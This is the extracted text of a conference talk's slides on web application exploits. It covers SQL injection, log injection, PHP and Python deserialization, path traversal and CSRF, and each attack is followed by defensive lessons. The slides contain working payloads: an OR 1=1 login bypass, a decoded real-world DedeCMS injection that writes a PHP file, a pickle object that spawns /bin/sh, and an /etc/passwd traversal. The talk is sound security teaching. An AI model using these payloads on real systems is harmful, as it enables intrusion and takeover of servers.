App Exploits DECONSTRUCTED – FOR GOOD, NOT FOR EVIL. By Joël, from Fictive Kin 

Not if, but when. IT’S ONLY A MATTER OF TIME 

A long time ago, IN A HOTEL FAR, FAR AWAY… 

No content

Of course, he obviously tried to just use any (valid) room number with a generic name. 

201 Smith 

Overly verbose error messages are the best friend of any attacker. 

201 Smith Please verify with the front desk your room has been properly checked in and your last name correctly spelled in the hotel registration system. 

“Please verify with the front desk your room has been properly checked in and your last name correctly spelled in the hotel registration system.” 

SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201   AND  guest_last_name  =  ‘Smith’; 

WHERE  A  AND  B 

WHERE  A  AND  B  OR  True 

WHERE  (A  AND  B)  OR  True 

SELECT  COUNT(id)   FROM  current_guests   WHERE  room_number  =  201   AND  guest_last_name  =  ‘lolpwned’   OR  1=1; 

201 ‘ OR 1=1; 

The lesson here is… DON’T BE LAZY. 

The lesson here is… SECURITY IS HARD. 

The lesson here is… THAT THERE ARE MANY LESSONS. 

Injection Serialization Path Traversal Cross Site Scripting Cross Site Request Forgery 

Injection Attacks COME IN MANY FLAVOURS 

SQL INJECTIONS SANITIZE YOUR INPUTS 

10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96… 

10.58.17.55  -­‐  -­‐  [20/Feb/2015:16:19:35  +0000]  "GET  /page?product_id=arrs1%5B%5D%3D99%26arrs1%5B%5D %3D102%26arrs1%5B%5D%3D103%26arrs1%5B%5D%3D95%26arrs1%5B%5D%3D100%26arrs1%5B%5D%3D98%26arrs1%5B%5D %3D112%26arrs1%5B%5D%3D114%26arrs1%5B%5D%3D101%26arrs1%5B%5D%3D102%26arrs1%5B%5D%3D105%26arrs1%5B%5D %3D120%26arrs2%5B%5D%3D109%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D103%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D114%26arrs2%5B%5D%3D109%26arrs2%5B%5D %3D98%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D121%26arrs2%5B%5D%3D41%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D86%26arrs2%5B%5D%3D65%26arrs2%5B%5D%3D76%26arrs2%5B%5D%3D85%26arrs2%5B%5D %3D69%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D49%26arrs2%5B%5D%3D50%26arrs2%5B%5D %3D51%26arrs2%5B%5D%3D52%26arrs2%5B%5D%3D53%26arrs2%5B%5D%3D54%26arrs2%5B%5D%3D44%26arrs2%5B%5D %3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96%26arrs2%5B%5D %3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D123%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D %3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D125%26arrs2%5B%5D%3D102%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D108%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D95%26arrs2%5B%5D%3D99%26arrs2%5B%5D%3D111%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D116%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D40%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D120%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D118%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D46%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D44%26arrs2%5B%5D%3D39%26arrs2%5B%5D %3D39%26arrs2%5B%5D%3D60%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D %3D112%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D118%26arrs2%5B%5D%3D97%26arrs2%5B%5D %3D108%26arrs2%5B%5D%3D40%26arrs2%5B%5D%3D36%26arrs2%5B%5D%3D95%26arrs2%5B%5D%3D80%26arrs2%5B%5D %3D79%26arrs2%5B%5D%3D83%26arrs2%5B%5D%3D84%26arrs2%5B%5D%3D91%26arrs2%5B%5D%3D120%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D%3D105%26arrs2%5B%5D %3D93%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D%3D63%26arrs2%5B%5D%3D62%26arrs2%5B%5D %3D120%26arrs2%5B%5D%3D105%26arrs2%5B%5D%3D110%26arrs2%5B%5D%3D115%26arrs2%5B%5D%3D117%26arrs2%5B%5D %3D105%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D59%26arrs2%5B%5D %3D123%26arrs2%5B%5D%3D47%26arrs2%5B%5D%3D100%26arrs2%5B%5D%3D101%26arrs2%5B%5D%3D100%26arrs2%5B%5D %3D101%26arrs2%5B%5D%3D58%26arrs2%5B%5D%3D112%26arrs2%5B%5D%3D104%26arrs2%5B%5D%3D112%26arrs2%5B%5D %3D125%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D41%26arrs2%5B%5D%3D32%26arrs2%5B%5D%3D35%26arrs2%5B%5D %3D32%26arrs2%5B%5D%3D64%26arrs2%5B%5D%3D96%26arrs2%5B%5D%3D92%26arrs2%5B%5D%3D39%26arrs2%5B%5D%3D96… 

arrs1%5B%5D%3D99 URLENCODED 

arrs1[]=99 QUERY ARGS ARE KEY/VAL PAIRS OF ARRAYS AND INTEGERS 

arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96 

arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[] =112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109 &arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[ ]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&a rrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[] =110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100& arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=8 5&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=50&arrs2[]=51&arrs2[]= 52&arrs2[]=53&arrs2[]=54&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[] =39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arr s2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]= 125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&a rrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[] =116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&a rrs2[]=39&arrs2[]=120&arrs2[]=115&arrs2[]=118&arrs2[]=105&arrs2[]=112&arrs2[ ]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&ar rs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=11 2&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2 []=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs 2[]=120&arrs2[]=105&arrs2[]=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]= 93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=120&arrs2[]=105&arrs2 []=110&arrs2[]=115&arrs2[]=117&arrs2[]=105&arrs2[]=39&arrs2[]=39&arrs2[]=41& arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[ ]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39& arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92 &arrs2[]=39&arrs2[]=96 

99,  102,  103,  95,  100,  98,  112,  114,  101,  102,   105,  120,  109,  121,  116,  97,  103,  96,  32,  40,   97,  105,  100,  44,  101,  120,  112,  98,  111,  100,   121,  44,  110,  111,  114,  109,  98,  111,  100,   121,  41,  32,  86,  65,  76,  85,  69,  83,  40,  49,   50,  51,  52,  53,  54,  44,  64,  96,  92,  39,  96,   44,  39,  123,  100,  101,  100,  101,  58,  112,  104,   112,  125,  102,  105,  108,  101,  95,  112,  117,   116,  95,  99,  111,  110,  116,  101,  110,  116,   115,  40,  39,  39,  120,  115,  118,  105,  112,  46,   112,  104,  112,  39,  39,  44,  39,  39,  60,  63,   112,  104,  112,  32,  101,  118,  97,  108,  40,  36,   95,  80,  79,  83,  84,  91,  120,  105,  110,  115,   117,  105,  93,  41,  59,  63,  62,  120,  105,  110,   115,  117,  105,  39,  39,  41,  59,  123,  47,  100,   101,  100,  101,  58,  112,  104,  112,  125,  39,  41,   32,  35,  32,  64,  96,  92,  39,  96 

In  [1]:  input  =  "arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95…"   In  [2]:  parsed  =  input.split('&')   In  [3]:  v  =  [int(p.split('=')[1])  for  p  in  parsed  if  p  is  not  '']   In  [4]:  print  ''.join(chr(i)  for  i  in  v)   

cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''xinsui'');{/dede:php}')  #  @`\'` 

cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''xinsui'');{/dede:php}')  #  @`\'` 

cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''xinsui'');{/dede:php}')  #  @`\'` 

cfg_dbprefixmytag`  (aid,expbody,normbody)   VALUES(123456,@`\'`,'{dede:php} file_put_contents(''xsvip.php'',''xinsui'');{/dede:php}')  #  @`\'` 

No content

In Communist China, CMS HACK YOU! 

The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS! 

EX POST FACTO DETECTION LOG INVALID DATABASE QUERIES. 

LOG INJECTIONS COVERING UP THE DETAILS 

def  log_failed_login(username):          with  open("access.log",  'a')  as  f:                  f.write("User  login  failed  for:  %s\n"  %  username)   

guest\nUser  login  succeeded  for:  admin Here’s my username 

User  login  failed  for:  guest\n   User  login  succeeded  for:  admin\n 

The lesson here is… SANITIZE YOUR INPUTS! ESCAPE YOUR OUTPUTS! 

Serialization Attacks …ALSO COME IN SEVERAL FLAVOURS. 

Object Serialization DON’T TRUST YOUR OWN CACHE 

 ‘blue’);   echo  serialize($messages);   ?> 

a:1:{s:6:"sekret";s:4:"blue";} 

PHP unserialize() can instantiate objects. Serializing objects containing user input is, fundamentally, dangerous. 

Magic Methods will be your downfall __wakeup(), __destruct() 

http://www.slideshare.net/phdays/php-wordpress 

http://www.slideshare.net/phdays/php-wordpress 

http://www.slideshare.net/phdays/php-wordpress 

Object Serialization …IN YOUR COOKIES. 

People forget that users can (sometimes) modify cookies $_COOKIE 

a:2:{s:2:"id";s:1:"1";s:4:"name";s:4:"Joel";} array("id" => '1', 'name' => 'Joel') 

PHP is not Alone PYTHON cPICKLE HAS SIMILAR ISSUES 

class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError 

class AuthedProtocol(protocol.Protocol): def verify(self, headers): try: token = cPickle.loads(base64.b64decode(headers['AuthToken'])) if not check_hmac(token['signature'], token['data'], getSecretKey()): raise SomeError self.secure_data = token['data'] except: raise SomeError 

import cPickle, subprocess, base64 class Hackzor(object): def __reduce__(self): return (subprocess.Popen, (('/bin/sh',),)) 

AuthToken: Y3N1YnByb2Nlc3MKUG9wZW4KcDEKKChTJy9iaW4vc2gnCnAyCnRwMwp0cDQKUnA1Ci4= base64.b64encode(cPickle.dumps(RunBinSh())) 

Path Traversals FILES THAT SHOULDN’T BE SEEN 

$pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/$pdf”;   readfile($filename); 

GET /documents?pdf=../../etc/passwd 

$pdf  =  $_GET[‘pdf’];   $filename  =  “/var/www/../../etc/passwd”;   readfile($filename); 

The lesson here is… SANITIZE YOUR INPUTS! LIMIT SURFACE AREA (open_basedir etc.) PERMISSIONS MEAN THINGS! CHROOT IS YOUR FRIEND! 

CSRF …OR WHEN EVERYONE LIKED HAVING SEX WITH GOATS ON TWITTER 

No content

CSRF requires some social engineering “Hey, click this link for free money!” 

href=“/status?update=LOLPWNED” 

href=“/account?transfer=1billion&to=jperras” 

The lesson here is… USE CSRF TOKENS PER REQUEST! Access-Control-Allow-Origin! 

What’s a developer to do? 

Logging, logging, logging Intrusion Detection System (IDS) Security Mailing Lists Error notification systems (Sentry) … try to be smarter 

@jperras Joël Perras http://nerderati.com 

joind.in/13329